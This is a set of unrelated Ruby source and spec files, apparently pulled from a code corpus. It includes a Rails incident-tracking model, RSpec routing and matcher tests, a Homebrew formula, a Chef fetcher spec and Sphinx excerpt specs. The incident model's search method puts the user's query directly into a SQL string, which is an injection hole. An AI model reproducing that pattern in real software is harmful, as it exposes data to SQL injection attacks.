reviewer.reviewed_at = nil
reviewer.save
end
end
else
self.incedent_reviewers.each do |reviewer|
reviewer.reviewed_at = nil
reviewer.save
end
end
end
def solved!
self.status_id = Houston::Application.config.incedent_solved
self.set_status_all Houston::Application.config.incedent_solved
self.closed = true
end
def closed! user = nil
self.set_status Houston::Application.config.incedent_closed, user
self.closed = false
end
def waited! user = nil
self.set_status Houston::Application.config.incedent_waited, user
self.status_id = Houston::Application.config.incedent_waited
self.closed = false
end
def set_status status, user = nil
unless user.nil?
if self.has_worker? user
self.incedent_workers.each do |worker|
if (worker.worker.id == user.id)
worker.status_id = status
worker.save
end
end
self.save
else
self.add_worker user, status unless (self.initiator == user) or (self.operator == user)
end
else
self.status_id = status
end
end
def set_status_all status
if self.has_workers?
self.incedent_workers.each do |worker|
worker.status_id = status
worker.save
end
end
self.status_id = status
end
def set_finish_at_to_all
if self.has_workers?
self.incedent_workers.each do |worker|
worker.finish_at = self.finish_at unless worker.destroyed?
worker.save unless worker.destroyed?
end
end
end
def get_status status, user = nil
self.incedent_workers.each do |worker|
unless user.nil?
return (worker.status_id == status) if (worker.worker.id == user.id)
else
return false if (worker.status_id != status)
end
end
return false
end
def get_status_id user = nil
self.incedent_workers.each do |worker|
unless user.nil?
return worker.status_id if (worker.worker.id == user.id)
end
end
return self.status_id
end
def get_status_name user = nil
self.incedent_workers.each do |worker|
unless user.nil?
return worker.status.name if (worker.worker.id == user.id)
end
end
return self.status.name
end
def self.to_csv(options = {})
CSV.generate(options) do |csv|
csv << column_names
all.each do |incedent|
csv << incedent.attributes.values_at(*column_names)
end
end
end
def self.search(query)
where("name like '%#{query}%' or description like '%#{query}%'")
end
def self.notify_workers
User.active.each do |user|
@incedents = Incedent.solved(false).by_worker(user)
if @incedents.present?
IncedentMailer.incedents_in_progress(@incedents, user).deliver
end
end
end
def self.autoclose!
Incedent.closed.each do |incedent|
unless incedent.service_class.nil?
if (incedent.service_class.autoclose) and get_datetime(incedent.created_at, incedent.service_class.autoclose_hours) > Time.now
incedent.add_worker User.find(1) unless incedent.has_workers?
incedent.solved!
IncedentAction.create(incedent: incedent, status: incedent.status, worker: incedent.workers).save
end
end
end
end
end
class TheIncedent < Incedent
end
class TheProblem < Incedent
end
class TheSupport < Incedent
end
class TheChange < Incedent
end
| 28.89703 | 301 | 0.687796 |
795a871fe49559c7a59fc6f9f7e8546e6782ba20 | 37 | class Tariff < ApplicationRecord
end
| 12.333333 | 32 | 0.837838 |
bf387daf546255ad2aa4aa40a8b24af8d9238e46 | 1,269 | require "rails_helper"
RSpec.describe CustomGalleryLayoutsController, type: :routing do
describe "routing" do
it "routes to #index" do
expect(:get => "/custom_gallery_layouts").to route_to("custom_gallery_layouts#index")
end
it "routes to #new" do
expect(:get => "/custom_gallery_layouts/new").to route_to("custom_gallery_layouts#new")
end
it "routes to #show" do
expect(:get => "/custom_gallery_layouts/1").to route_to("custom_gallery_layouts#show", :id => "1")
end
it "routes to #edit" do
expect(:get => "/custom_gallery_layouts/1/edit").to route_to("custom_gallery_layouts#edit", :id => "1")
end
it "routes to #create" do
expect(:post => "/custom_gallery_layouts").to route_to("custom_gallery_layouts#create")
end
it "routes to #update via PUT" do
expect(:put => "/custom_gallery_layouts/1").to route_to("custom_gallery_layouts#update", :id => "1")
end
it "routes to #update via PATCH" do
expect(:patch => "/custom_gallery_layouts/1").to route_to("custom_gallery_layouts#update", :id => "1")
end
it "routes to #destroy" do
expect(:delete => "/custom_gallery_layouts/1").to route_to("custom_gallery_layouts#destroy", :id => "1")
end
end
end
| 31.725 | 110 | 0.670607 |
622670e8541caccb6a5ef2ba18a9540d95749d45 | 3,140 | ##########################GO-LICENSE-START################################
# Copyright 2014 ThoughtWorks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##########################GO-LICENSE-END##################################
require File.join(File.dirname(__FILE__), "..", "..", "..", "spec_helper")
describe "admin/package_definitions/new.html.erb" do
it "should render new pkg def page" do
metadata = PackageConfigurations.new
metadata.addConfiguration(PackageConfiguration.new("key1").with(PackageConfiguration::SECURE, false).with(PackageConfiguration::DISPLAY_NAME, "Key 1"))
metadata.addConfiguration(PackageConfiguration.new("key2").with(PackageConfiguration::SECURE, true).with(PackageConfiguration::REQUIRED, false).with(PackageConfiguration::DISPLAY_NAME, "Key 2"))
package_definition = PackageDefinition.new
p1 = ConfigurationProperty.new(ConfigurationKey.new("key1"), ConfigurationValue.new("value1"))
p2 = ConfigurationProperty.new(ConfigurationKey.new("key2"), EncryptedConfigurationValue.new("value2"))
configuration = Configuration.new([p1, p2].to_java(com.thoughtworks.go.domain.config.ConfigurationProperty))
package_definition.setConfiguration(configuration)
assign(:package_configuration, PackageViewModel.new(metadata, package_definition))
render
expect(response.body).to have_selector(".information", :text => "The new package will be available to be used as material in all pipelines. Other admins might be able to edit this package.")
expect(response.body).to have_selector(".new_form_item_block label", :text => "Package Name*")
expect(response.body).to have_selector(".new_form_item_block input[type='text'][name='material[package_definition[name]]']")
expect(response.body).to have_selector(".new_form_item input[type='hidden'][name='material[package_definition[configuration][0][configurationKey][name]]'][value='key1']")
expect(response.body).to have_selector(".new_form_item label", :text => "Key 1*")
expect(response.body).to have_selector(".new_form_item input[type='text'][name='material[package_definition[configuration][0][configurationValue][value]]'][value='value1']")
expect(response.body).to have_selector(".new_form_item input[type='hidden'][name='material[package_definition[configuration][1][configurationKey][name]]'][value='key2']")
expect(response.body).to have_selector(".new_form_item label", :text => "Key 2")
expect(response.body).to have_selector(".new_form_item input[type='password'][name='material[package_definition[configuration][1][configurationValue][value]]'][value='value2']")
end
end | 64.081633 | 198 | 0.735669 |
5da2e202b40dc7b6af85e504fb5af24d5c4abe22 | 12,277 | require File.dirname(__FILE__) + '/../../spec_helper.rb'
module HaveSpecHelper
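  # Builds an owner holding two collections of n items each: one reached through
  # a method whose collection responds to #length and one whose collection
  # responds to #size.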
def create_collection_owner_with(n)
owner = Spec::Expectations::Helper::CollectionOwner.new
(1..n).each do |n|
owner.add_to_collection_with_length_method(n)
owner.add_to_collection_with_size_method(n)
end
owner
end
end
describe "should have(n).items" do
include HaveSpecHelper
it "should pass if target has a collection of items with n members" do
owner = create_collection_owner_with(3)
owner.should have(3).items_in_collection_with_length_method
owner.should have(3).items_in_collection_with_size_method
end
it "should convert :no to 0" do
owner = create_collection_owner_with(0)
owner.should have(:no).items_in_collection_with_length_method
owner.should have(:no).items_in_collection_with_size_method
end
it "should fail if target has a collection of items with < n members" do
owner = create_collection_owner_with(3)
lambda {
owner.should have(4).items_in_collection_with_length_method
}.should fail_with("expected 4 items_in_collection_with_length_method, got 3")
lambda {
owner.should have(4).items_in_collection_with_size_method
}.should fail_with("expected 4 items_in_collection_with_size_method, got 3")
end
it "should fail if target has a collection of items with > n members" do
owner = create_collection_owner_with(3)
lambda {
owner.should have(2).items_in_collection_with_length_method
}.should fail_with("expected 2 items_in_collection_with_length_method, got 3")
lambda {
owner.should have(2).items_in_collection_with_size_method
}.should fail_with("expected 2 items_in_collection_with_size_method, got 3")
end
end
describe 'should have(1).item when ActiveSupport::Inflector is defined' do
include HaveSpecHelper
before(:each) do
unless defined?(ActiveSupport::Inflector)
      @active_support_was_not_defined = true
module ActiveSupport
class Inflector
def self.pluralize(string)
string.to_s + 's'
end
end
end
end
end
it 'should pluralize the collection name' do
owner = create_collection_owner_with(1)
owner.should have(1).item
end
after(:each) do
if @active_support_was_not_defined
Object.send :remove_const, :ActiveSupport
end
end
end
describe 'should have(1).item when Inflector is defined' do
include HaveSpecHelper
before(:each) do
unless defined?(Inflector)
      @inflector_was_not_defined = true
class Inflector
def self.pluralize(string)
string.to_s + 's'
end
end
end
end
it 'should pluralize the collection name' do
owner = create_collection_owner_with(1)
owner.should have(1).item
end
after(:each) do
if @inflector_was_not_defined
Object.send :remove_const, :Inflector
end
end
end
describe "should have(n).items where result responds to items but returns something other than a collection" do
it "should provide a meaningful error" do
owner = Class.new do
def items
Object.new
end
end.new
lambda do
owner.should have(3).items
end.should raise_error("expected items to be a collection but it does not respond to #length or #size")
end
end
describe "should_not have(n).items" do
include HaveSpecHelper
it "should pass if target has a collection of items with < n members" do
owner = create_collection_owner_with(3)
owner.should_not have(4).items_in_collection_with_length_method
owner.should_not have(4).items_in_collection_with_size_method
end
it "should pass if target has a collection of items with > n members" do
owner = create_collection_owner_with(3)
owner.should_not have(2).items_in_collection_with_length_method
owner.should_not have(2).items_in_collection_with_size_method
end
it "should fail if target has a collection of items with n members" do
owner = create_collection_owner_with(3)
lambda {
owner.should_not have(3).items_in_collection_with_length_method
}.should fail_with("expected target not to have 3 items_in_collection_with_length_method, got 3")
lambda {
owner.should_not have(3).items_in_collection_with_size_method
}.should fail_with("expected target not to have 3 items_in_collection_with_size_method, got 3")
end
end
describe "should have_exactly(n).items" do
include HaveSpecHelper
it "should pass if target has a collection of items with n members" do
owner = create_collection_owner_with(3)
owner.should have_exactly(3).items_in_collection_with_length_method
owner.should have_exactly(3).items_in_collection_with_size_method
end
it "should convert :no to 0" do
owner = create_collection_owner_with(0)
owner.should have_exactly(:no).items_in_collection_with_length_method
owner.should have_exactly(:no).items_in_collection_with_size_method
end
it "should fail if target has a collection of items with < n members" do
owner = create_collection_owner_with(3)
lambda {
owner.should have_exactly(4).items_in_collection_with_length_method
}.should fail_with("expected 4 items_in_collection_with_length_method, got 3")
lambda {
owner.should have_exactly(4).items_in_collection_with_size_method
}.should fail_with("expected 4 items_in_collection_with_size_method, got 3")
end
it "should fail if target has a collection of items with > n members" do
owner = create_collection_owner_with(3)
lambda {
owner.should have_exactly(2).items_in_collection_with_length_method
}.should fail_with("expected 2 items_in_collection_with_length_method, got 3")
lambda {
owner.should have_exactly(2).items_in_collection_with_size_method
}.should fail_with("expected 2 items_in_collection_with_size_method, got 3")
end
end
describe "should have_at_least(n).items" do
include HaveSpecHelper
it "should pass if target has a collection of items with n members" do
owner = create_collection_owner_with(3)
owner.should have_at_least(3).items_in_collection_with_length_method
owner.should have_at_least(3).items_in_collection_with_size_method
end
it "should pass if target has a collection of items with > n members" do
owner = create_collection_owner_with(3)
owner.should have_at_least(2).items_in_collection_with_length_method
owner.should have_at_least(2).items_in_collection_with_size_method
end
it "should fail if target has a collection of items with < n members" do
owner = create_collection_owner_with(3)
lambda {
owner.should have_at_least(4).items_in_collection_with_length_method
}.should fail_with("expected at least 4 items_in_collection_with_length_method, got 3")
lambda {
owner.should have_at_least(4).items_in_collection_with_size_method
}.should fail_with("expected at least 4 items_in_collection_with_size_method, got 3")
end
it "should provide educational negative failure messages" do
#given
owner = create_collection_owner_with(3)
length_matcher = have_at_least(3).items_in_collection_with_length_method
size_matcher = have_at_least(3).items_in_collection_with_size_method
#when
length_matcher.matches?(owner)
size_matcher.matches?(owner)
#then
length_matcher.negative_failure_message.should == <<-EOF
Isn't life confusing enough?
Instead of having to figure out the meaning of this:
should_not have_at_least(3).items_in_collection_with_length_method
We recommend that you use this instead:
should have_at_most(2).items_in_collection_with_length_method
EOF
size_matcher.negative_failure_message.should == <<-EOF
Isn't life confusing enough?
Instead of having to figure out the meaning of this:
should_not have_at_least(3).items_in_collection_with_size_method
We recommend that you use this instead:
should have_at_most(2).items_in_collection_with_size_method
EOF
end
end
describe "should have_at_most(n).items" do
include HaveSpecHelper
it "should pass if target has a collection of items with n members" do
owner = create_collection_owner_with(3)
owner.should have_at_most(3).items_in_collection_with_length_method
owner.should have_at_most(3).items_in_collection_with_size_method
end
it "should fail if target has a collection of items with > n members" do
owner = create_collection_owner_with(3)
lambda {
owner.should have_at_most(2).items_in_collection_with_length_method
}.should fail_with("expected at most 2 items_in_collection_with_length_method, got 3")
lambda {
owner.should have_at_most(2).items_in_collection_with_size_method
}.should fail_with("expected at most 2 items_in_collection_with_size_method, got 3")
end
it "should pass if target has a collection of items with < n members" do
owner = create_collection_owner_with(3)
owner.should have_at_most(4).items_in_collection_with_length_method
owner.should have_at_most(4).items_in_collection_with_size_method
end
it "should provide educational negative failure messages" do
#given
owner = create_collection_owner_with(3)
length_matcher = have_at_most(3).items_in_collection_with_length_method
size_matcher = have_at_most(3).items_in_collection_with_size_method
#when
length_matcher.matches?(owner)
size_matcher.matches?(owner)
#then
length_matcher.negative_failure_message.should == <<-EOF
Isn't life confusing enough?
Instead of having to figure out the meaning of this:
should_not have_at_most(3).items_in_collection_with_length_method
We recommend that you use this instead:
should have_at_least(4).items_in_collection_with_length_method
EOF
size_matcher.negative_failure_message.should == <<-EOF
Isn't life confusing enough?
Instead of having to figure out the meaning of this:
should_not have_at_most(3).items_in_collection_with_size_method
We recommend that you use this instead:
should have_at_least(4).items_in_collection_with_size_method
EOF
end
end
describe "have(n).items(args, block)" do
it "should pass args to target" do
target = mock("target")
target.should_receive(:items).with("arg1","arg2").and_return([1,2,3])
target.should have(3).items("arg1","arg2")
end
it "should pass block to target" do
target = mock("target")
block = lambda { 5 }
target.should_receive(:items).with("arg1","arg2", block).and_return([1,2,3])
target.should have(3).items("arg1","arg2", block)
end
end
describe "have(n).items where target IS a collection" do
it "should reference the number of items IN the collection" do
[1,2,3].should have(3).items
end
it "should fail when the number of items IN the collection is not as expected" do
lambda { [1,2,3].should have(7).items }.should fail_with("expected 7 items, got 3")
end
end
describe "have(n).characters where target IS a String" do
it "should pass if the length is correct" do
"this string".should have(11).characters
end
it "should fail if the length is incorrect" do
lambda { "this string".should have(12).characters }.should fail_with("expected 12 characters, got 11")
end
end
describe "have(n).things on an object which is not a collection nor contains one" do
it "should fail" do
lambda { Object.new.should have(2).things }.should raise_error(NoMethodError, /undefined method `things' for #<Object:/)
end
end
describe Spec::Matchers::Have, "for a collection owner that implements #send" do
include HaveSpecHelper
before(:each) do
@collection = Object.new
def @collection.floozles; [1,2] end
def @collection.send(*args); raise "DOH! Library developers shouldn't use #send!" end
end
it "should work in the straightforward case" do
lambda {
@collection.should have(2).floozles
}.should_not raise_error
end
it "should work when doing automatic pluralization" do
lambda {
@collection.should have_at_least(1).floozle
}.should_not raise_error
end
it "should blow up when the owner doesn't respond to that method" do
lambda {
@collection.should have(99).problems
}.should raise_error(NoMethodError, /problems/)
end
end
| 34.485955 | 124 | 0.752627 |
91f5ae5a8e161e07fbea458b86a409d80f3e6cd8 | 1,752 | class GnomeLatex < Formula
desc "LaTeX editor for the GNOME desktop"
homepage "https://wiki.gnome.org/Apps/GNOME-LaTeX"
url "https://download.gnome.org/sources/gnome-latex/3.38/gnome-latex-3.38.0.tar.xz"
sha256 "a82a9fc6f056929ea18d6dffd121e71b2c21768808c86ef1f34da0f86e220d77"
license "GPL-3.0-or-later"
livecheck do
url :stable
end
bottle do
sha256 "f1dbea254436194246d1ea3fcd47a5b08b394efb3a08f48a9a3decd85120ce90" => :catalina
sha256 "c8f5a18378b6a759f3f4614baedf693814b61da0dfecd2f0d8d6ad93bef3fa25" => :mojave
sha256 "7a9d3285f2457fecacc4e0840e32ac940b0e77041dd30839e6a7af7ad55453dd" => :high_sierra
end
depends_on "gobject-introspection" => :build
depends_on "intltool" => :build
depends_on "itstool" => :build
depends_on "pkg-config" => :build
depends_on "vala" => :build
depends_on "adwaita-icon-theme"
depends_on "gnome-themes-standard"
depends_on "gspell"
depends_on "libgee"
depends_on "tepl"
def install
system "./configure", "--disable-schemas-compile",
"--disable-dependency-tracking",
"--disable-silent-rules",
"--disable-dconf-migration",
"--prefix=#{prefix}"
system "make", "install"
end
def post_install
system "#{Formula["glib"].opt_bin}/glib-compile-schemas",
"#{HOMEBREW_PREFIX}/share/glib-2.0/schemas"
system "#{Formula["gtk+3"].opt_bin}/gtk3-update-icon-cache", "-f", "-t",
"#{HOMEBREW_PREFIX}/share/icons/hicolor"
system "#{Formula["gtk+3"].opt_bin}/gtk3-update-icon-cache", "-f", "-t",
"#{HOMEBREW_PREFIX}/share/icons/HighContrast"
end
test do
system "#{bin}/gnome-latex", "--version"
end
end
| 34.352941 | 93 | 0.668379 |
33c50e7052c17d4c8d5226a17eb6e42546545f3f | 282 | module SampleEngine
class ApplicationController < ActionController::Base
include Applogic::ApplicationHelper
skip_before_action :verify_authenticity_token
# protect_from_forgery unless: -> { request.format.json? }
# protect_from_forgery with: :exception
end
end
| 31.333333 | 62 | 0.783688 |
ed5c4f38a2c9e05cdee0fa533cb3634bf1f2d390 | 560 | # typed: true
# frozen_string_literal: true
class Formula
undef shared_library
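  # Builds ".so"-style shared library names, optionally suffixed with a version (e.g. "libfoo.so.1").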
def shared_library(name, version = nil)
"#{name}.so#{"." unless version.nil?}#{version}"
end
class << self
undef ignore_missing_libraries
def ignore_missing_libraries(*libs)
libraries = libs.flatten
if libraries.any? { |x| !x.is_a?(String) && !x.is_a?(Regexp) }
raise FormulaSpecificationError, "#{__method__} can handle Strings and Regular Expressions only"
end
allowed_missing_libraries.merge(libraries)
end
end
end
| 23.333333 | 104 | 0.689286 |
4ad2314f922a1825418d653622f6d1c0bf60e86e | 399 | # == Schema Information
#
# Table name: users
#
# id :bigint not null, primary key
# username :string not null
# password_digest :string not null
# created_at :datetime not null
# updated_at :datetime not null
#
FactoryBot.define do
factory :user do
username { "Caligula" }
password { "Password" }
end
end
| 23.470588 | 58 | 0.561404 |
62df4ebfec50a0300868379e303ea283d7e3a227 | 150 | class Tagging < ActiveRecord::Base
belongs_to :post, optional: true
belongs_to :tag, optional: true
delegate :name, to: :tag, prefix: true
end
| 21.428571 | 40 | 0.726667 |
87ed6b4ec16990cc1f3f52eb0c184e154cbfd8d9 | 3,198 | # encoding: utf-8
#
# Cookbook Name:: audit
# Spec:: fetcher
#
# Copyright 2016 Chef Software, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
require 'spec_helper'
require_relative '../../../files/default/vendor/chef-server/fetcher'
describe ChefServer::Fetcher do
let(:mynode) { Chef::Node.new }
let(:myprofile) { 'compliance://foobazz' }
let(:profile_hash) {
{
name: 'linux-baseline',
compliance: 'user/linux-baseline',
version: '2.1.0'
}
}
let(:profile_hash_target) {
'/organizations/org/owners/user/compliance/linux-baseline/version/2.1.0/tar'
}
let(:non_profile_url){
'http://127.0.0.1:8889/organizations/org/owners/user/compliance/linux-baseline/version/2.1.0/tar'
}
context 'when target is a string' do
before :each do
allow(Chef).to receive(:node).and_return(mynode)
allow(ChefServer::Fetcher).to receive(:construct_url).and_return(URI(myprofile))
allow(ChefServer::Fetcher).to receive(:chef_server_visibility?).and_return(true)
end
it 'should resolve a target' do
mynode.default['audit']['fetcher'] = nil
res = ChefServer::Fetcher.resolve(myprofile)
expect(res.target).to eq(URI(myprofile))
end
it 'should add /compliance URL prefix if needed' do
mynode.default['audit']['fetcher'] = 'chef-server'
expect(ChefServer::Fetcher.url_prefix).to eq('/compliance')
end
it 'should omit /compliance if not' do
mynode.default['audit']['fetcher'] = nil
expect(ChefServer::Fetcher.url_prefix).to eq('')
end
end
context 'when target is a hash' do
before :each do
Chef::Config[:chef_server_url] = 'http://127.0.0.1:8889/organizations/org'
allow(Chef).to receive(:node).and_return(mynode)
end
it 'should resolve a target with a version' do
mynode.default['audit']['fetcher'] = nil
res = ChefServer::Fetcher.resolve(profile_hash)
expect(res.target.request_uri).to eq(profile_hash_target)
end
end
context 'when profile not found' do
before :each do
Chef::Config[:verify_api_cert] = false
Chef::Config[:ssl_verify_mode] = :verify_none
allow(Chef).to receive(:node).and_return(mynode)
end
it 'should raise error' do
myproc = proc {
config = {
'server_type' => 'automate',
'automate' => {
'ent' => 'my_ent',
'token_type' => 'dctoken',
},
'profile' => ['admin', 'linux-baseline', '2.0']
}
Fetchers::Url.new('non_profile_url', config).send(:http_opts)
}
expect {myproc.call}.to raise_error(RuntimeError)
end
end
end
| 31.663366 | 101 | 0.653533 |
21dfc51b14c9e114974c3e4e6cc75e38acc9ce67 | 2,219 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::Network::Mgmt::V2020_06_01
module Models
#
# DNS Proxy Settings in Firewall Policy.
#
class DnsSettings
include MsRestAzure
# @return [Array<String>] List of Custom DNS Servers.
attr_accessor :servers
# @return [Boolean] Enable DNS Proxy on Firewalls attached to the
# Firewall Policy.
attr_accessor :enable_proxy
# @return [Boolean] FQDNs in Network Rules are supported when set to
# true.
attr_accessor :require_proxy_for_network_rules
#
# Mapper for DnsSettings class as Ruby Hash.
# This will be used for serialization/deserialization.
#
def self.mapper()
{
client_side_validation: true,
required: false,
serialized_name: 'DnsSettings',
type: {
name: 'Composite',
class_name: 'DnsSettings',
model_properties: {
servers: {
client_side_validation: true,
required: false,
serialized_name: 'servers',
type: {
name: 'Sequence',
element: {
client_side_validation: true,
required: false,
serialized_name: 'StringElementType',
type: {
name: 'String'
}
}
}
},
enable_proxy: {
client_side_validation: true,
required: false,
serialized_name: 'enableProxy',
type: {
name: 'Boolean'
}
},
require_proxy_for_network_rules: {
client_side_validation: true,
required: false,
serialized_name: 'requireProxyForNetworkRules',
type: {
name: 'Boolean'
}
}
}
}
}
end
end
end
end
| 28.088608 | 74 | 0.497972 |
03cdf76c0db0dad90f38aa3d85ac0e939df897fd | 147 | class AddUniqueToLeageuser < ActiveRecord::Migration[5.1]
def change
add_index :league_users, [:user_id, :league_id], unique: true
end
end
| 24.5 | 65 | 0.748299 |
0183ab86da19df3ac9adc60e6a7406c2dda4b9c9 | 842 | require 'json'
package = JSON.parse(File.read(File.join(__dir__, '..', 'package.json')))
Pod::Spec.new do |s|
s.name = 'EXCamera'
s.version = package['version']
s.summary = package['description']
s.description = package['description']
s.license = package['license']
s.author = package['author']
s.homepage = package['homepage']
s.platform = :ios, '10.0'
s.source = { :git => "https://github.com/expo/expo.git" }
s.source_files = 'EXCamera/**/*.{h,m}'
s.preserve_paths = 'EXCamera/**/*.{h,m}'
s.requires_arc = true
s.dependency 'UMCore'
s.dependency 'UMFileSystemInterface'
s.dependency 'UMImageLoaderInterface'
s.dependency 'UMPermissionsInterface'
s.dependency 'UMFaceDetectorInterface'
s.dependency 'UMBarCodeScannerInterface'
end
| 30.071429 | 73 | 0.634204 |
e821aa929c3c8caa51573a6036fe487676d3ca39 | 719 | require 'travis/addons/handlers/base'
require 'travis/addons/handlers/task'
module Travis
module Addons
module Handlers
class Slack < Base
include Handlers::Task
EVENTS = 'build:finished'
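        # Notify only when Slack is enabled, at least one room is configured,
        # and the build result matches the configured send_on rules.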
def handle?
enabled?(:slack) && targets.present? && config.send_on?(:slack, action)
end
def handle
run_task(:slack, payload, targets: targets)
end
def targets
@targets ||= config.values(:slack, :rooms)
end
class Instrument < Addons::Instrument
def notify_completed
publish(targets: handler.targets)
end
end
Instrument.attach_to(self)
end
end
end
end
| 20.542857 | 81 | 0.585535 |
11119ed222d878fb27810873d43465fa6b4c0b2d | 6,280 | # frozen_string_literal: true
require 'spec_helper'
describe "Sphinx Excepts", :live => true do
let(:client) { Riddle::Client.new "localhost", 9313 }
let(:controller) do
controller = Riddle::Controller.new nil, ''
controller.bin_path = Sphinx.new.bin_path
controller
end
it "should highlight a single word multiple times in a document" do
excerpts = client.excerpts(
:index => "people",
:words => "Mary",
:docs => ["Mary, Mary, quite contrary."]
)
if controller.sphinx_version.to_i >= 3
excerpts.should == [
'<span class="match">Mary, Mary</span>, quite contrary.'
]
else
excerpts.should == [
'<span class="match">Mary</span>, <span class="match">Mary</span>, quite contrary.'
]
end
end
it "should use specified word markers" do
excerpts = client.excerpts(
:index => "people",
:words => "Mary",
:docs => ["Mary, Mary, quite contrary."],
:before_match => "<em>",
:after_match => "</em>"
)
if controller.sphinx_version.to_i >= 3
excerpts.should == [
"<em>Mary, Mary</em>, quite contrary."
]
else
excerpts.should == [
"<em>Mary</em>, <em>Mary</em>, quite contrary."
]
end
end
it "should separate matches that are far apart by an ellipsis by default" do
excerpts = client.excerpts(
:index => "people",
:words => "Pat",
:docs => [
<<-SENTENCE
This is a really long sentence written by Pat. It has to be over 256
characters long, between keywords. But what is the keyword? Well, I
can't tell you just yet... wait patiently until we've hit the 256 mark.
It'll take a bit longer than you think. We're probably just hitting the
200 mark at this point. But I think we've now arrived - so I can tell
you what the keyword is. I bet you're really interested in finding out,
yeah? Excerpts are particularly riveting. This keyword, however, is
not. It's just my name: Pat.
SENTENCE
],
:before_match => "<em>",
:after_match => "</em>"
)
case Riddle.loaded_version
when '0.9.9'
excerpts.should == [
<<-SENTENCE
This is a really long sentence written by <em>Pat</em>. It has to be over 256
characters long, between keywords. But what is the … 're really interested in finding out,
yeah? Excerpts are particularly riveting. This keyword, however, is
not. It's just my name: <em>Pat</em>.
SENTENCE
]
when '1.10'
excerpts.should == [" … really long sentence written by <em>Pat</em>. It has to be over … . This keyword, however, is\nnot. It's just my name: <em>Pat</em> … "]
when '2.0.1', '2.1.0'
excerpts.should == [" … really long sentence written by <em>Pat</em>. It has to be over … . It's just my name: <em>Pat</em>.\n"]
else
excerpts.should == [
<<-SENTENCE
This is a really long sentence written by <em>Pat</em>. It has to be over 256
characters long, between keywords. But what is the keyword? … interested in finding out,
yeah? Excerpts are particularly riveting. This keyword, however, is
not. It's just my name: <em>Pat</em>.
SENTENCE
]
end
end
it "should use the provided separator" do
excerpts = client.excerpts(
:index => "people",
:words => "Pat",
:docs => [
<<-SENTENCE
This is a really long sentence written by Pat. It has to be over 256
characters long, between keywords. But what is the keyword? Well, I
can't tell you just yet... wait patiently until we've hit the 256 mark.
It'll take a bit longer than you think. We're probably just hitting the
200 mark at this point. But I think we've now arrived - so I can tell
you what the keyword is. I bet you're really interested in finding out,
yeah? Excerpts are particularly riveting. This keyword, however, is
not. It's just my name: Pat.
SENTENCE
],
:before_match => "<em>",
:after_match => "</em>",
:chunk_separator => " --- "
)
case Riddle.loaded_version
when '0.9.9'
excerpts.should == [
<<-SENTENCE
This is a really long sentence written by <em>Pat</em>. It has to be over 256
characters long, between keywords. But what is the --- 're really interested in finding out,
yeah? Excerpts are particularly riveting. This keyword, however, is
not. It's just my name: <em>Pat</em>.
SENTENCE
]
when '1.10'
excerpts.should == [" --- really long sentence written by <em>Pat</em>. It has to be over --- . This keyword, however, is\nnot. It's just my name: <em>Pat</em> --- "]
when '2.0.1', '2.1.0'
excerpts.should == [" --- really long sentence written by <em>Pat</em>. It has to be over --- . It's just my name: <em>Pat</em>.\n"]
else
excerpts.should == [
<<-SENTENCE
This is a really long sentence written by <em>Pat</em>. It has to be over 256
characters long, between keywords. But what is the keyword? --- interested in finding out,
yeah? Excerpts are particularly riveting. This keyword, however, is
not. It's just my name: <em>Pat</em>.
SENTENCE
]
end
end
it "should return multiple results for multiple documents" do
excerpts = client.excerpts(
:index => "people",
:words => "Mary",
:docs => [
"Mary, Mary, quite contrary.",
"The epithet \"Bloody Mary\" is associated with a number of historical and fictional women, most notably Queen Mary I of England"
],
:before_match => "<em>",
:after_match => "</em>"
)
if controller.sphinx_version.to_f >= 3
excerpts.should == [
"<em>Mary, Mary</em>, quite contrary.",
"The epithet \"Bloody <em>Mary</em>\" is associated with a number of historical and fictional women, most notably Queen <em>Mary</em> I of England"
]
else
excerpts.should == [
"<em>Mary</em>, <em>Mary</em>, quite contrary.",
"The epithet \"Bloody <em>Mary</em>\" is associated with a number of historical and fictional women, most notably Queen <em>Mary</em> I of England"
]
end
end
end
| 37.159763 | 185 | 0.616561 |
b9443b9a8a5f006f01d8dd114588119dc820fcd1 | 1,292 | =begin
#OpenAPI Petstore
#This spec is mainly for testing Petstore server and contains fake endpoints, models. Please do not use this for any other purpose. Special characters: \" \\
The version of the OpenAPI document: 1.0.0
Generated by: https://openapi-generator.tech
OpenAPI Generator version: 5.0.0-SNAPSHOT
=end
require 'spec_helper'
require 'json'
require 'date'
# Unit tests for Petstore::Category
# Automatically generated by openapi-generator (https://openapi-generator.tech)
# Please update as you see appropriate
describe 'Category' do
before do
# run before each test
@instance = Petstore::Category.new
end
after do
# run after each test
end
describe 'test an instance of Category' do
it 'should create an instance of Category' do
expect(@instance).to be_instance_of(Petstore::Category)
end
end
describe 'test attribute "id"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "name"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
end
| 24.846154 | 157 | 0.715944 |
f7914ccf294ff942c074d184af0f8a1724af0ad4 | 47,346 | require "spec_helper"
describe Identification, "creation" do
describe "without callbacks" do
it "should store the previous observation taxon" do
o = make_research_grade_observation
previous_observation_taxon = o.taxon
i = Identification.make!( observation: o )
expect( i.previous_observation_taxon ).to eq previous_observation_taxon
end
it "should not create a blank preference when vision is nil" do
i = Identification.make!( vision: nil )
expect( i.stored_preferences ).to be_blank
end
describe "with an inactive taxon" do
it "should replace the taxon with its active equivalent" do
taxon_change = make_taxon_swap
taxon_change.committer = taxon_change.user
taxon_change.commit
expect( taxon_change.input_taxon ).not_to be_is_active
expect( Identification.make!( taxon: taxon_change.input_taxon ).taxon ).to eq taxon_change.output_taxon
end
it "should not replace the taxon if there is no active equivalent" do
